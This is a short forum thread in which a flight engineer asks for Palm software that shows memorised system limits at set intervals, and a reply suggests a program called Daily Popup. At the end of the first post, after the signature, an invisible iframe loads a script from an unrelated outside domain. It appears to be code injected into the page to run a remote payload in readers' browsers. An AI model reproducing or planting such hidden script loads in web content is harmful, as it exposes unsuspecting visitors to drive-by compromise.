+ Reply to Thread

Flashcard/Word of the day type software?

Hey all,

I have a very large need for a piece of Palm software that I am hoping someone can help me with. I need a piece of software that will display pieces of information - it could be memos or just a blank screen with the data on it - at regular intervals. Something like a word of the day type thing. I have a lot of specifications that I have to remember (I am a flight engineer so I have to remember all of the systems limitations) and I'd like to have a program that just pops up with the information on a daily basis, or even a customizable basis like two to three times a day or once a week, etc.

Does anyone have any idea if something with that capability exists? Ideally, something that I could have pop up when I open the flip or something, but really anything like what I have described would be great. Right now I have to use flash cards and that's rather cumbersome considering the volume, and it uses too much battery power to use a flashcard Palm program for any extned period of time.

If this does not exist, I would be willing to pay money for this type of capability (within reason ) . If one of you Palm programmers is interested.

I would assume that lots of other people would be interested in this type of program as well. People like doctors and such.

Please let me know if anyone knows of anything or would be willing to take on writing this app. Feel free to PM me if you want.

Thanks!

Mike<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Would Daily Popup work?

http://www.palmgear.com/software/sho...16&prodID=2182

I've sent the author an ascii file (years ago) and he converted it to a database for this program